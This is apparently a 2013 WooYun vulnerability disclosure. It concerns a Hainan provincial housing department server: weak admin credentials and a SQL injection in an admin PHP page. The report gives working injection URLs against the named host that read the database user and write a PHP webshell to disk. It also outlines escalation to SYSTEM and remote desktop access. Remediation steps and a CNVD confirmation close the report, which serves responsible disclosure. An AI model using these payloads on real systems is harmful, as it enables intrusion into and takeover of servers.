当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044481

漏洞标题:海南省住房和城乡建设厅服务器弱口令及后台sql注射漏洞(root+system)

相关厂商:海南省住房和城乡建设厅

漏洞作者: 问天

提交时间:2013-12-01 20:23

修复时间:2014-01-15 20:24

公开时间:2014-01-15 20:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-01: 细节已通知厂商并且等待厂商处理中
2013-12-02: 厂商已经确认,细节仅向厂商公开
2013-12-12: 细节向核心白帽子及相关领域专家公开
2013-12-22: 细节向普通白帽子公开
2014-01-01: 细节向实习白帽子公开
2014-01-15: 细节向公众公开

简要描述:

海南省住房和城乡建设厅

详细说明:

http://www.hnjst.gov.cn:81
海南省住房和城乡建设厅网站服务器iAudit系统admin弱口令直接后台:
后台php字符型注射:
http://www.hnjst.gov.cn:81/admin/admin_user_edit.php?form_action=edit_user&user_name=j' and%090xa=0xb union /*!select*/ 1,2,user(),4,5,6,7,8,9,10,11 from `mysql`.`user`%23
得到mysql用户为root

2.JPG


结合
http://www.hnjst.gov.cn:81/phpinfo.php得到的web物理路径和操作系统windows2k3
直接
http://www.hnjst.gov.cn:81/admin/admin_user_edit.php?form_action=edit_user&user_name=j' and%090xa=0xb union /*!select*/ 1,2,0x(php一句话木马16进制串),4,5,6,7,8,9,10,11 /*!into*//*Y*/dumpfile/*Q*/'D:/iAuditCenter/console/u.php'%23
再上传得到大马,查看配置文件,利用mysql的udf就很方便的搞下远程3389权限

1.JPG


后台弱口令

漏洞证明:

弱口令登入:

3.JPG


1.JPG


4.JPG


直接system权限

5.JPG

修复方案:

1.强制用户使用复杂口令
2.修改后台的所有注入漏洞
3.去掉默认phpinfo.php页面
4.mysql数据库账户和运行用户降低权限
5.apache降低权限

版权声明:转载请注明来源 问天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-02 22:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给海南分中心,由其后续联系网站管理单位处置。

最新状态:

暂无